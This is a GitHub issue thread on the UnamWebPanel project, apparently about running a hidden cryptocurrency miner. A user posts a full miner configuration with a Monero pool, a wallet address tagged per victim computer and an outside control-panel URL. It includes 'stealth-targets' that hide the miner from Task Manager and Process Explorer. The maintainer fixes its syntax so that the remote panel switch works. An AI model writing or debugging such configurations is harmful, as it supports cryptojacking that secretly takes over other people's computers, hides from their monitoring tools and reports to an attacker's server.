UnamSanctam / UnamWebPanel

MIT License
164 stars 61 forks source link

switching miners webpenal #304

Closed DARK-DEVIL-66 closed 7 months ago

DARK-DEVIL-66 commented 7 months ago

i builting time never metioned miners web penal url(api end point url) but i mentioned remote config url

now can switch web penal url of my choice any time ? like tish with remote config

{ "algo": "rx/0", "pool": "xmr.2miners.com", "port": 12222, "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}", "password": "x", "nicehash": false, "ssltls": true, "max-cpu": 20, "idle-wait": 5, "idle-cpu": 80, "api-endpoint": "http://ns-neatgroups.net/api/endpoint.php" "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": false }

DARK-DEVIL-66 commented 7 months ago

i am using 3.1.1 builder

UnamSanctam commented 7 months ago

Yes by using the "api-endpoint" option in the "Remote Configuration" you can change the web panel URL.

DARK-DEVIL-66 commented 7 months ago

but it's not working

UnamSanctam commented 7 months ago

Probably because you're missing a comma (,) at the end of that line. All lines except the last one should have a comma after it.

DARK-DEVIL-66 commented 7 months ago

"api-endpoint": "http://ns-neatgroups.net/api/endpoint.php",

it's rigth?

UnamSanctam commented 7 months ago

Yes that is correct.